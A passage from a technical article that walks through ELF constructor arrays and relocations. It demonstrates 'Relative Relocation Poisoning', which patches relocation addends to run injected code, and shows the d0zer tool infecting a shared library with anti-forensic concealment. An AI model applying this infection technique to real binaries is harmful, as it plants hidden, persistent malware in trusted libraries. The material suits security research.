(dynamic tag entries are part of the dynamic segment and utilized by the dynamic linker/loader for binaries that are 
dynamically linked). This array consists of function pointers, each pointing to a constructor routine that will 
execute before the *main* function. We can see the entries with ‘objdump’ again: 


[sad0p@Arch-Deliberate experimental]$ objdump -D ctors | grep .init_array -A 15 
Disassembly of section .init_array: 

0000000000003dc0 <.init_array>: 
    3dc0: 30 11    xor  %dl,(%rcx) 
    3dc2: 00 00    add  %al,(%rax) 
    3dc4: 00 00    add  %al,(%rax) 
    3dc6: 00 00    add  %al,(%rax) 
    3dc8: 39 11    cmp  %edx,(%rcx) 
    3dca: 00 00    add  %al,(%rax) 
    3dcc: 00 00    add  %al,(%rax) 
    3dce: 00 00    add  %al,(%rax) 
    3dd0: 5a       pop  %rdx 
    3dd1: 11 00    adc  %eax,(%rax) 
    3dd3: 00 00    add  %al,(%rax) 
    3dd5: 00 00    add  %al,(%rax) 

Disassembly of section .fini_array: 
[sad0p@Arch-Deliberate experimental]$ 


Disregard the “disassembly” portion, as *.init_array* does not hold instructions; the “-D” flag in objdump causes 
all sections to be disassembled regardless. Instead, focus on the hex byte output: you will see “39 11” at offset 
0x3dc8, the same value we obtained from the ‘nm’ output for the *msg* function and constructor, but in little-endian 
byte order. Let us overwrite one of these function pointers with the offset for our *not_called* function. 
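
To make the byte-order point concrete, here is a small sketch that decodes the raw *.init_array* bytes from the objdump output into function offsets. The helper names `read_le64` and `init_array_entry` are ours, and the code assumes 8-byte entries as on x86_64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode one 8-byte little-endian value, independent of host byte order. */
static uint64_t read_le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Decode entry `index` of a raw .init_array dump that is `len` bytes long. */
static uint64_t init_array_entry(const uint8_t *raw, size_t len, size_t index)
{
    assert(raw != NULL && (index + 1) * 8 <= len);
    return read_le64(raw + index * 8);
}
```

Fed the 24 bytes shown above (30 11 00 ..., 39 11 00 ..., 5a 11 00 ...), the three entries decode to 0x1130, 0x1139 (*msg*), and 0x115a (*second*).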


Load the binary in ‘r2’ in write mode (-w) with the *analyze all* flag (-A). 


[sad0p@Arch-Deliberate experimental]$ r2 -Aw ctors 
run r2 with -e bin.cache=true to fix relocations in disassembly 
Analyze all flags starting with sym. and entry0 (aa) 
Analyze all functions arguments/locals (afva@@@F) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Finding and parsing C++ vtables (avrr) 
Type matching analysis for all functions (aaft) 
Propagate noreturn information (aanr) 
Use -AA or aaaa to perform additional experimental analysis 
 -- You can debug a program from the graph view (‘ag’) using standard radare2 commands 


Get the address (use the ‘vaddr’ field, since ‘r2’ emulates loading the binary in memory) of the *.init_array* section. 


nth paddr      vaddr      name 
0   0x00000000 0x00000000 
1   0x00000318 0x00000318 .interp 
2   0x00000338 0x00000338 .note.gnu.property 
3   0x00000378 0x00000378 .note.gnu.build-id 
4   0x0000039c 0x0000039c .note.ABI-tag 
5   0x000003c0 0x000003c0 .gnu.hash 
6   0x000003e0 0x000003e0 .dynsym 
7   0x00000488 0x00000488 .dynstr 
8   0x00000516 0x00000516 .gnu.version 
9   0x00000528 0x00000528 .gnu.version_r 
10  0x00000558 0x00000558 .rela.dyn 
11  0x00000648 0x00000648 .rela.plt 
12  0x00001000 0x00001000 .init 
13  0x00001020 0x00001020 .plt 
14  0x00001040 0x00001040 .text 
15  0x000011a0 0x000011a0 .fini 
16  0x00002000 0x00002000 .rodata 
17  0x000020ac 0x000020ac .eh_frame_hdr 
18  0x000020e8 0x000020e8 .eh_frame 
19  0x00002dc0 0x00003dc0 .init_array 
20  0x00002dd8 0x00003dd8 .fini_array 
21  0x00002de0 0x00003de0 .dynamic 
22  0x00002fc0 0x00003fc0 .got 
23  0x00002fe8 0x00003fe8 .got.plt 
24  0x00003008 0x00004008 .data 
25  0x00003018 0x00004018 .bss 
26  0x00003018 0x00000000 .comment 
27  0x00003038 0x00000000 .symtab 
28  0x000032c0 0x00000000 .strtab 
29  0x000033fd 0x00000000 .shstrtab 
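
For *.init_array*, the file offset (paddr 0x2dc0) and the virtual address (vaddr 0x3dc0) differ. When patching the file directly rather than through r2, that translation has to be done by hand. A minimal sketch, assuming the section headers have already been read into an array (`vaddr_to_offset` is a hypothetical helper name):

```c
#include <assert.h>
#include <elf.h>      /* Elf64_Shdr; assumes a Linux toolchain that ships <elf.h> */
#include <stddef.h>
#include <stdint.h>

/* Translate a virtual address into a file offset using section headers.
 * Returns 0 and stores the result in *off on success, or -1 if no
 * allocated, file-backed section contains vaddr. */
static int vaddr_to_offset(const Elf64_Shdr *sh, size_t count,
                           uint64_t vaddr, uint64_t *off)
{
    assert(sh != NULL && off != NULL);
    for (size_t i = 0; i < count; i++) {
        /* Skip sections that are not mapped or have no bytes in the file. */
        if (!(sh[i].sh_flags & SHF_ALLOC) || sh[i].sh_type == SHT_NOBITS)
            continue;
        if (vaddr >= sh[i].sh_addr && vaddr - sh[i].sh_addr < sh[i].sh_size) {
            *off = sh[i].sh_offset + (vaddr - sh[i].sh_addr);
            return 0;
        }
    }
    return -1;
}
```

With the *.init_array* header from the listing (address 0x3dc0, offset 0x2dc0) and a section size of 0x18, the virtual address 0x3dc8 maps to file offset 0x2dc8.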


We then seek to it and print out the hex dump to verify we are where we need to be. 


s 0x00003dc0 
px 


[hex dump of *.init_array*: the 8-byte entries hold 0x1130, 0x1139, and 0x115a in little-endian byte order] 


We then retrieve the offset of the *not_called* function and write the offset in little-endian byte order. Finally, we rerun 
the binary to see if we successfully got the *not_called* function to run. 


[0x00003dc8]> is~not_called 
1   0x00001170 0x00001170 GLOBAL FUNC   22       not_called 
[r2 write of the bytes 70 11 00 00 at 0x00003dc8, followed by a hex dump of the patched entry] 


[sad0p@Arch-Deliberate experimental]$ ./ctors 
hello from msg() constructor 
hello from second() constructor 
hello from main -- hopefully all constructors were called. 


Interestingly enough, not only did the *not_called* function not execute, but our *msg* function and constructor 
executed despite overwriting the entry. We can analyze what is happening with ‘gdb’ and the GEF (GDB Enhanced 
Features) plugin. 


[sad0p@Arch-Deliberate experimental]$ gdb ctors 
Copyright (C) 2023 Free Software Foundation, Inc. 
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> 
This is free software: you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. 
Type "show copying" and "show warranty" for details. 
This GDB was configured as "x86_64-pc-linux-gnu". 
Type "show configuration" for configuration details. 
For bug reporting instructions, please see: 
<https://www.gnu.org/software/gdb/bugs/>. 
Find the GDB manual and other documentation resources online at: 
    <http://www.gnu.org/software/gdb/documentation/>. 

For help, type "help". 
Type "apropos word" to search for commands related to "word"... 
GEF for linux ready, type `gef' to start, `gef config' to configure 
90 commands loaded and 5 functions added for GDB [...] in 0.01ms using Python engine [...] 
Reading symbols from ctors... 

This GDB supports auto-downloading debuginfo from the following URLs: 
  [...] 
Debuginfod has been disabled. 
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit. 
(No debugging symbols found in ctors) 
gef➤ break _start 
Breakpoint 1 at [...] 


From here, we run the binary, and execution halts at our breakpoint, allowing us to grab the virtual address of 
*.init_array* by issuing the *maintenance info sections* command to ‘gdb’. 


gef➤ maintenance info sections 
Exec file: 
    `/home/sad0p/go/src/github.com/d0zer/experimental/ctors', file type elf64-x86-64. 
    0x555555554318->0x555555554334 at 0x00000318: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554338->0x555555554378 at 0x00000338: .note.gnu.property ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554378->0x55555555439c at 0x00000378: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x55555555439c->0x5555555543bc at 0x0000039c: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x5555555543c0->0x5555555543dc at 0x000003c0: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x5555555543e0->0x555555554488 at 0x000003e0: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554488->0x555555554515 at 0x00000488: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554516->0x555555554524 at 0x00000516: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554528->0x555555554558 at 0x00000528: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554558->0x555555554648 at 0x00000558: .rela.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555554648->0x555555554660 at 0x00000648: .rela.plt ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555555000->0x55555555501b at 0x00001000: .init ALLOC LOAD READONLY CODE HAS_CONTENTS 
    0x555555555020->0x555555555040 at 0x00001020: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS 
    0x555555555040->0x5555555551a0 at 0x00001040: .text ALLOC LOAD READONLY CODE HAS_CONTENTS 
    0x5555555551a0->0x5555555551ad at 0x000011a0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS 
    0x555555556000->0x5555555560ac at 0x00002000: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x5555555560ac->0x5555555560e8 at 0x000020ac: .eh_frame_hdr ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x5555555560e8->0x5555555561c4 at 0x000020e8: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS 
    0x555555557dc0->0x555555557dd8 at 0x00002dc0: .init_array ALLOC LOAD DATA HAS_CONTENTS 
    0x555555557dd8->0x555555557de0 at 0x00002dd8: .fini_array ALLOC LOAD DATA HAS_CONTENTS 
    0x555555557de0->0x555555557fc0 at 0x00002de0: .dynamic ALLOC LOAD DATA HAS_CONTENTS 
    0x555555557fc0->0x555555557fe8 at 0x00002fc0: .got ALLOC LOAD DATA HAS_CONTENTS 
    0x555555557fe8->0x555555558008 at 0x00002fe8: .got.plt ALLOC LOAD DATA HAS_CONTENTS 
    0x555555558008->0x555555558018 at 0x00003008: .data ALLOC LOAD DATA HAS_CONTENTS 
    0x555555558018->0x555555558020 at 0x00003018: .bss ALLOC 
    0x00000000->0x0000001b at 0x00003018: .comment READONLY HAS_CONTENTS 


We take the start address and add 8 (the entry of interest is 8 bytes away from the start of *.init_array*, if you recall 
from our ‘r2’ session). We then set a watch point for any writes occurring at the entry and continue execution. 


gef➤ watch *(long *)0x555555557dc8 
Hardware watchpoint 2: *(long *)0x555555557dc8 
gef➤ r 
Starting program: 
Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fc8000' 

Hardware watchpoint 2: *(long *)0x555555557dc8 

Old value = 0x1170                (label 1) 
New value = 0x555555555139 
in () from                        (label 2) 

[GEF context panes (registers, stack, code, threads, trace) are not recoverable from the source. Label 3 marks the 
*mov* instruction, inside the dynamic linker, that triggered the watchpoint.] 

The resulting output has three pieces of information of interest, highlighted and labeled 1-3. At label 1 we can see the 
value changed from 0x1170 (offset of the *not_called* function) to 0x555555555139. Label 2 tells us execution halted 
in *ld-linux-x86-64.so.2*, which is the dynamic/runtime linker and loader. Label 3 highlights the instruction that 
triggered the watch point, resulting in the halt of execution. The value in the *rdx* register is copied via the *mov* 
instruction to the memory address held in *rcx*. The values 0x00555555555139 and 0x00555555557dc8 are *rdx* 
and *rcx* respectively. GEF detected and dereferenced the function pointer in *rcx*, resulting in the symbol *msg*, 
which is our msg function and constructor. Further confirmation is done by issuing *info symbol <addr>* in ‘gdb’ and 
disassembling the function. 


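gef➤ info symbol 0x00555555555139 
msg in section .text of /home/sad0p/go/src/github.com/d0zer/experimental/ctors 
gef➤ disas msg 
Dump of assembler code for function msg: 
   0x0000555555555139 <+0>:     push   rbp 
   0x000055555555513a <+1>:     mov    rbp,rsp 
   0x000055555555513d <+4>:     sub    rsp,0x10 
   0x0000555555555141 <+8>:     mov    DWORD PTR [rbp-0x4],edi 
   0x0000555555555144 <+11>:    mov    QWORD PTR [rbp-0x10],rsi 
   0x0000555555555148 <+15>:    lea    rax,[rip+0xeb9]        # 0x555555556008 
   0x000055555555514f <+22>:    mov    rdi,rax 
   0x0000555555555152 <+25>:    call   0x555555555030 <puts@plt> 
   0x0000555555555157 <+30>:    nop 
   0x0000555555555158 <+31>:    leave 
   0x0000555555555159 <+32>:    ret 
End of assembler dump. 
gef➤ 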


From this analysis, we can conclude that whatever offsets are in *.init_array* will be overwritten at runtime. Secondly, 
overwriting the offsets in *.init_array* occurs in the dynamic/runtime linker and loader code. Earlier, we mentioned 
that shared objects undergo mapping into the process’s address space. The dynamic/runtime linker and loader is no 
exception. After the kernel creates the process’s image, it places information into memory for the process (the stack 
region specifically) in structures called auxiliary vectors and transfers execution to the dynamic/runtime linker and 
loader. The dynamic/runtime linker and loader will then use this information to further populate the process image 
with the required code and data necessary for successful execution. 


One of the critical tasks the dynamic linker performs (especially in PIE binaries) is to carry out relocations. This 
means performing calculations based on the data in relocation records, and sometimes on data at specific locations 
(in the case of REL relocation structures, which utilize implicit addends), then patching the binary in memory 
(sometimes called “hot-patching”). As you can imagine, this is important on systems that utilize ASLR (Address Space 
Layout Randomization), as the base address (the memory address where the binary undergoes mapping/loading at 
runtime) is unknown to the compiler and link editor (ld). The same holds for shared objects, which have to be position 
independent and rely on the dynamic linker to “resolve” offsets to absolute addresses (using the program’s base 
address) when other binaries link against the shared object. 


To deal with this behavior, we need to better understand Relative Relocations, one of the dynamic linker’s many 
relocation types. You can view the relocation activity printed by the dynamic linker in the following screenshot. You will 
observe the dynamic/runtime linker and loader honoring the LD_DEBUG environment variable and printing out the 
requested information about the execution of the program long before execution reaches any constructor: 


[sad0p@Arch-Deliberate experimental]$ LD_DEBUG=reloc,statistics ./ctors 
     50386: 
     50386:     relocation processing: /usr/lib/libc.so.6 
     50386: 
     50386:     relocation processing: ./ctors (lazy) 
     50386: 
     50386:     relocation processing: /lib64/ld-linux-x86-64.so.2 
     50386: 
     50386:     runtime linker statistics: 
     50386:       total startup time in dynamic loader: 210923 cycles 
     50386:                 time needed for relocation: 61941 cycles (29.3%) 
     50386:                      number of relocations: 94 
     50386:           number of relocations from cache: 7 
     50386:             number of relative relocations: 5 
     50386:                time needed to load objects: 68689 cycles (32.5%) 
     50386: 
     50386:     calling init: /lib64/ld-linux-x86-64.so.2 
     50386: 
     50386: 
     50386:     calling init: /usr/lib/libc.so.6 
     50386: 
     50386: 
     50386:     initialize program: ./ctors 
     50386: 
hello from msg() constructor 
hello from second() constructor 
     50386: 
     50386:     transferring control: ./ctors 
     50386: 
hello from main -- hopefully all constructors were called. 

     50386: 
     50386:     calling fini: [0] 
     50386: 
     50386: 
     50386:     calling fini: /usr/lib/libc.so.6 [0] 
     50386: 
     50386: 
     50386:     calling fini: /lib64/ld-linux-x86-64.so.2 [0] 
     50386: 
     50386: 
     50386:     runtime linker statistics: 
     50386:                final number of relocations: 95 
     50386:     final number of relocations from cache: 7 
[sad0p@Arch-Deliberate experimental]$ 


Now we can look at the relocation entries to demystify what is happening with *.init_array*. In the following 
screenshot, the first five relocation entries are of interest (Relative Relocations) and are of type *R_X86_64_RELATIVE*. 
The last column lists the addend of each entry. The addend with the value 0x1139 is the offset for our 
msg function and constructor. On the same row, to the left (in the offset column), we see a virtual offset (0x3dc8) 
where we could expect the relocation to occur at runtime: 


[sad0p@Arch-Deliberate experimental]$ readelf -r ctors 

Relocation section '.rela.dyn' at offset 0x558 contains 10 entries: 
  Offset          Info           Type           Sym. Value    Sym. Name + Addend 
000000003dc0  000000000008 R_X86_64_RELATIVE                    1130 
000000003dc8  000000000008 R_X86_64_RELATIVE                    1139 
000000003dd0  000000000008 R_X86_64_RELATIVE                    115a 
000000003dd8  000000000008 R_X86_64_RELATIVE                    10e0 
000000004010  000000000008 R_X86_64_RELATIVE                    4010 
000000003fc0  000100000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0 
000000003fc8  000200000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_deregisterTM[...] + 0 
000000003fd0  000400000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0 
000000003fd8  000500000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_registerTMCl[...] + 0 
000000003fe0  000600000006 R_X86_64_GLOB_DAT 0000000000000000 __cxa_finalize@GLIBC_2.2.5 + 0 

Relocation section '.rela.plt' at offset 0x648 contains 1 entry: 
  Offset          Info           Type           Sym. Value    Sym. Name + Addend 
000000004000  000300000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0 
[sad0p@Arch-Deliberate experimental]$ 


The calculation for R_X86_64_RELATIVE is B + A: the base address at which the binary is mapped at runtime (B) plus 
the addend field value (A). The result of the calculation is written into memory at the specified virtual offset 
(0x000000003dc8, which is within the defined memory region for the *.init_array* section) by the dynamic linker. So if 
we replace the addend field of the relocation record for the msg function with the offset for *not_called*, then we can 
have the dynamic linker execute *not_called* as if it were a constructor. Included below is the relocation structure. 
Note that the x86_64 architecture utilizes explicit addends (meaning there is a field in the structure allocated for the 
addend) and uses relocation structures of type RELA. Here’s an example of a RELA relocation structure: 


typedef struct elf64_rela { 
    Elf64_Addr   r_offset; 
    Elf64_Xword  r_info; 
    Elf64_Sxword r_addend; 
} Elf64_Rela; 
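
To see the B + A calculation in action, the following sketch applies a single R_X86_64_RELATIVE record to a buffer standing in for the mapped image. It is an illustration only and is not how glibc implements relocation processing; `apply_relative` is a hypothetical name, and the base address 0x555555554000 in the usage note is inferred from the gdb section listing (0x555555554318 at file offset 0x318).

```c
#include <assert.h>
#include <elf.h>      /* Elf64_Rela, ELF64_R_TYPE; assumes a Linux toolchain */
#include <stdint.h>
#include <string.h>

/* Apply one R_X86_64_RELATIVE record. `image` points at the bytes mapped
 * for virtual offset 0 and `base` is the load address (B). Returns the
 * value stored (B + A), or 0 for any other relocation type. */
static uint64_t apply_relative(uint8_t *image, uint64_t base,
                               const Elf64_Rela *rel)
{
    assert(image != NULL && rel != NULL);
    if (ELF64_R_TYPE(rel->r_info) != R_X86_64_RELATIVE)
        return 0;
    uint64_t value = base + (uint64_t)rel->r_addend;      /* B + A */
    /* Store in host byte order, which is little-endian on x86_64. */
    memcpy(image + rel->r_offset, &value, sizeof value);
    return value;
}
```

For the record with offset 0x3dc8 and addend 0x1139, a base of 0x555555554000 yields 0x555555555139, which is the “New value” the watch point reported.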


Let us attempt to modify the relocation entry for the msg function and constructor to execute our *not_called* function. 
We can start by reloading the binary into ‘r2’, locating the .rela.dyn section, seeking to the start of the section, 
and reading the hex dump of its entries: 


[sad0p@Arch-Deliberate experimental]$ r2 -Aw ctors 
run r2 with -e bin.cache=true to fix relocations in disassembly 
Analyze all flags starting with sym. and entry0 (aa) 
Analyze all functions arguments/locals (afva@@@F) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Finding and parsing C++ vtables (avrr) 
Type matching analysis for all functions (aaft) 
Propagate noreturn information (aanr) 
Use -AA or aaaa to perform additional experimental analysis 
 -- Calculate current basic block checksum with the ph command (ph md5, ph crc32, 
iS 
[Sections] 

nth paddr      size  vaddr      vsize type        name 
0   0x00000000 0x0   0x00000000 0x0   NULL 
1   0x00000318 0x1c  0x00000318 0x1c  PROGBITS    .interp 
2   0x00000338 0x40  0x00000338 0x40  NOTE        .note.gnu.property 
3   0x00000378 0x24  0x00000378 0x24  NOTE        .note.gnu.build-id 
4   0x0000039c 0x20  0x0000039c 0x20  NOTE        .note.ABI-tag 
5   0x000003c0 0x1c  0x000003c0 0x1c  GNU_HASH    .gnu.hash 
6   0x000003e0 0xa8  0x000003e0 0xa8  DYNSYM      .dynsym 
7   0x00000488 0x8d  0x00000488 0x8d  STRTAB      .dynstr 
8   0x00000516 0xe   0x00000516 0xe   GNU_VERSYM  .gnu.version 
9   0x00000528 0x30  0x00000528 0x30  GNU_VERNEED .gnu.version_r 
10  0x00000558 0xf0  0x00000558 0xf0  RELA        .rela.dyn 
11  0x00000648 0x18  0x00000648 0x18  RELA        .rela.plt 
12  0x00001000 0x1b  0x00001000 0x1b  PROGBITS    .init 
13  0x00001020 0x20  0x00001020 0x20  PROGBITS    .plt 
14  0x00001040 0x160 0x00001040 0x160 PROGBITS    .text 
15  0x000011a0 0xd   0x000011a0 0xd   PROGBITS    .fini 
16  0x00002000 0xac  0x00002000 0xac  PROGBITS    .rodata 
17  0x000020ac 0x3c  0x000020ac 0x3c  PROGBITS    .eh_frame_hdr 
18  0x000020e8 0xdc  0x000020e8 0xdc  PROGBITS    .eh_frame 
19  0x00002dc0 0x18  0x00003dc0 0x18  INIT_ARRAY  .init_array 
20  0x00002dd8 0x8   0x00003dd8 0x8   FINI_ARRAY  .fini_array 
21  0x00002de0 0x1e0 0x00003de0 0x1e0 DYNAMIC     .dynamic 
22  0x00002fc0 0x28  0x00003fc0 0x28  PROGBITS    .got 
23  0x00002fe8 0x20  0x00003fe8 0x20  PROGBITS    .got.plt 
24  0x00003008 0x10  0x00004008 0x10  PROGBITS    .data 
25  0x00003018 0x0   0x00004018 0x8   NOBITS      .bss 
26  0x00003018 0x1b  0x00000000 0x1b  PROGBITS    .comment 
27  0x00003038 0x288 0x00000000 0x288 SYMTAB      .symtab 
28  0x000032c0 0x13d 0x00000000 0x13d STRTAB      .strtab 
29  0x000033fd 0x116 0x00000000 0x116 STRTAB      .shstrtab 

s 0x00000558 


Each entry is 24 bytes, so we seek 24 bytes to get past the first entry and an additional 16 bytes to arrive at the 
addend field: 


px 


[hex dump of the .rela.dyn entries; the bytes are not recoverable from the source] 


Then write the offset of the *not_called* function into the addend field: 


wx 7011000000000000 
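
The same edit can be sketched programmatically. The helpers below are assumptions of ours (the names `addend_file_offset` and `poison_relative` do not come from any tool) and operate on a copy of the .rela.dyn entries already read into memory; writing the table back to disk is omitted.

```c
#include <assert.h>
#include <elf.h>      /* Elf64_Rela, ELF64_R_TYPE; assumes a Linux toolchain */
#include <stddef.h>
#include <stdint.h>

/* File offset of the r_addend field of entry `index` in a RELA table that
 * starts at file offset `rela_off` (24-byte entries, addend 16 bytes in). */
static uint64_t addend_file_offset(uint64_t rela_off, size_t index)
{
    return rela_off + index * sizeof(Elf64_Rela)
           + offsetof(Elf64_Rela, r_addend);
}

/* Replace the addend of the R_X86_64_RELATIVE record whose r_offset equals
 * `r_offset`. Returns the index of the patched record, or -1 if none. */
static long poison_relative(Elf64_Rela *rela, size_t count,
                            uint64_t r_offset, uint64_t new_addend)
{
    assert(rela != NULL);
    for (size_t i = 0; i < count; i++) {
        if (ELF64_R_TYPE(rela[i].r_info) == R_X86_64_RELATIVE &&
            rela[i].r_offset == r_offset) {
            rela[i].r_addend = (Elf64_Sxword)new_addend;
            return (long)i;
        }
    }
    return -1;
}
```

Here `addend_file_offset(0x558, 1)` evaluates to 0x580, the position reached by seeking 24 + 16 bytes into the section, and `poison_relative(rela, 10, 0x3dc8, 0x1170)` swaps the addend of the *msg* record for the offset of *not_called*.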


Our binary executes and yields the expected results. 


[sad0p@Arch-Deliberate experimental]$ ./ctors 
I should have never been called 

hello from second() constructor 
hello from main -- hopefully all constructors were called. 

[sad0p@Arch-Deliberate experimental]$ 


We now have a viable proof of concept for executing parasitic code without modifying the entry point, instead 
altering relocation records to make the dynamic/runtime linker and loader do our handiwork. I call this process 
Relative Relocation Poisoning/Hijacking. We can now target any ELF binary utilizing relative relocations, including 
standard executables and libraries (shared objects). So binary infection methods such as *PT_NOTE* to *PT_LOAD* 
and *Text Segment Padding*, once used to target standard ELF executables, can now be applied to ELF shared 
objects. Any ELF binary linked against an infected shared library would then have parasitic code 
executed within the execution context of the binary. 


We can demonstrate full infection using ‘d0zer’, a program I first wrote to inject standard ELF executables with 
arbitrary payloads using the *Text Segment Padding* algorithm. It has since been augmented to support 
*PT_NOTE* to *PT_LOAD* with Relative Relocation Hijacking/Poisoning in shared objects and standard executables 
that employ relative relocations. The following example will utilize the *testlib.so* and *main* ELF binaries we 
compiled earlier. First, recompile the *testlib.so* binary with the instructions from earlier in the article, because the 
binary underwent modification with our symbol hijacking exercise. Then execute the *main* program (assuming it is 
still in the same directory from the earlier example) to view the output. 


[sad0p@Arch-Deliberate testlib2]$ gcc -c testlib.c -o testlib.o -fPIC 
[sad0p@Arch-Deliberate testlib2]$ gcc -shared testlib.o -o testlib.so 
[sad0p@Arch-Deliberate testlib2]$ ./main 
This is func1 
[sad0p@Arch-Deliberate testlib2]$ 


Now, ‘d0zer’ contains a default payload that prints “hello -- this is a non destructive payload” for testing purposes; we 
will use it for this example. The following screenshot shows ‘d0zer’ carrying out the *PT_NOTE* to *PT_LOAD* infection 
algorithm, then locating the dynamic segment to find where relocation entries are stored, iterating over the records 
to find a suitable entry (more on this later), hijacking/poisoning the relocation record’s addend field to point to our 
parasitic code, and making sure the corresponding *.init_array* entry matches on disk. Making sure the relocation 
record’s addend and .init_array share the same value is essential from an anti-detection or anti-forensics standpoint. 
Even though the *.init_array* contents on disk are useless, we want them to appear as if the compiler and link editor 
produced the entirety of the binary. It is worth noting that ‘d0zer’ does not overwrite the original binary but creates an 
infected copy suffixed with “-infected,” so you will need to replace the legitimate file with the infected one before 
running the *main* program: 


[sad0p@Arch-Deliberate testlib2]$ ../../d0zer -ctorsHijack -infectionAlgo PtNoteToPtLoad -debug -target testlib.so 
PT_NOTE segment pHeader index @ 6 
[+] Converting PT_NOTE to PT_LOAD and setting PERM R-X 
[+] Newly created PT_LOAD virtual address starts at 0xc003aa8 
[+] CtorsHijack requested. Locating and reading Dynamic Segment 
[+] 24 entries in Dynamic Segment 
[+] Located DT_RELA @ 0x0000000000000498 
DT_RELA has 24 entries 
File offset of relocations @ 0x0000000000000498 
Found viable relocation record hooking/poisoning 
        offset: 0x0000000000003df8 
        type: R_X86_64_RELATIVE 
        Addend: 0x0000000000001100 
offset 0x0000000000002df8 updated with value (Addend) 000000000c003aa8 
PAYLOAD 
[payload hex dump: the hex columns are not recoverable; the legible part of the ASCII column follows] 
|TPQSRVWUAPAQARAS| 
|ATAUAVAW...+..-h| 
|ello -- this is | 
|a non destructiv| 
|e payload 
[+] Increased Phdr.Filesz by length of payload (0x90) 
[+] Increased Phdr.Memsz by length of payload (0x90) 
[+] Increased section header offset from 0x3318 to 0x33a8 to account for payload 
[sad0p@Arch-Deliberate testlib2]$ mv testlib.so-infected testlib.so 
[sad0p@Arch-Deliberate testlib2]$ ./main 
hello -- this is a non destructive payloadThis is func1 
[sad0p@Arch-Deliberate testlib2]$ 


We can also demonstrate “Text Segment Padding” after recompiling *testlib.so* and replacing the legitimate shared
object with the infected version that d0zer produces.


[sad0p@Arch-Deliberate testlib2]$ gcc -c testlib.c -o testlib.o -fPIC
[sad0p@Arch-Deliberate testlib2]$ gcc -shared testlib.o -o testlib.so
[sad0p@Arch-Deliberate testlib2]$ ../../d0zer -ctorsHijack -infectionAlgo TextSegmentPadding -debug -target testlib.so
CtorsHijack requested. Locating and reading Dynamic Segment
24 entries in Dynamic Segment
Located DT_RELA @ 0x0000000000000498
DT_RELA has 24 entries
File offset of relocations @ 0x0000000000000498
Found viable relocation record hooking/poisoning
    offset: 0x0000000000003df8
    type: R_X86_64_RELATIVE
    Addend: 0x0000000000001100
offset 0x0000000000002df8 updated with value (Addend) 0000000000001145
Text segment starts @ 0x1000
Text segment ends @ 0x1145
Payload size pre-epilogue 0x5c
Appended default restoration stub
Generated and appended position independent return 2 OEP stub to payload
Payload size post-epilogue
------PAYLOAD------
[hex dump of the payload; its ASCII column contains "hello -- this is a non destructive payload"]
Increased text segment p_filesz and p_memsz by 144 (length of payload)
Adjusting segments after text segment file offsets by 0x1000
Inceasing pHeader @ index 2 by 0x1000
Inceasing pHeader @ index 3 by 0x1000
Inceasing pHeader @ index 4 by 0x1000
Inceasing pHeader @ index 8 by 0x1000
Inceasing pHeader @ index 10 by 0x1000
Increasing section header addresses if they come after text segment
Extending section header entry for text section by payload len.
(14) Updating sections past text section @ addr 0x2000
(15) Updating sections past text section @ addr 0x201c
(16) Updating sections past text section @ addr 0x2040
(17) Updating sections past text section @ addr 0x3df8
(18) Updating sections past text section @ addr 0x3e00
(19) Updating sections past text section @ addr 0x3e08
(20) Updating sections past text section @ addr 0x3fc8
(21) Updating sections past text section @ addr 0x3fe8
(22) Updating sections past text section @ addr 0x4008
(23) Updating sections past text section @ addr 0x4010
(24) Updating sections past text section @ addr 0x0
(25) Updating sections past text section @ addr 0x0
(26) Updating sections past text section @ addr 0x0
(27) Updating sections past text section @ addr 0x0
writing payload into the binary
[sad0p@Arch-Deliberate testlib2]$ mv testlib.so-infected testlib.so
[sad0p@Arch-Deliberate testlib2]$ ./main
hello -- this is a non destructive payloadThis is func1
[sad0p@Arch-Deliberate testlib2]$


In our r2 example, we overwrote the relocation entry, meaning the original entry never got executed; this is bad
practice, as relocation entries are essential to the program’s function (they are often associated with critical
initialization routines in both standard executables and shared objects). In d0zer, this is handled by having the
parasitic code pass execution to the code/function that the relocation record referenced pre-infection. As stated
earlier in the article, one of the goals of binary infection is to leave the binary in a state where it can function
as if it was not infected.


There are limits to Relative Relocation Poisoning/Hijacking. For instance, not all relative relocations are associated
with executable code. Some are associated with data objects. Look at the *readelf* output of a simple “hello world”
application dynamically linked against *libc*. The *readelf* application is run with the flag “-s” to look for symbols
(second run of *readelf* in the following screenshot), and its output is piped to grep to match symbols with their
offsets. We can see that the first two offsets gathered from the relocation record printout have symbol type *FUNC*
(defined as *STT_FUNC* in *elf.h*), which indicates the symbol is associated with a function or executable code. The
last *readelf* run, with offset 0x4010, shows this offset is of type OBJECT, which lets us know the relocation is
associated with data. You would need to avoid hijacking these entries.


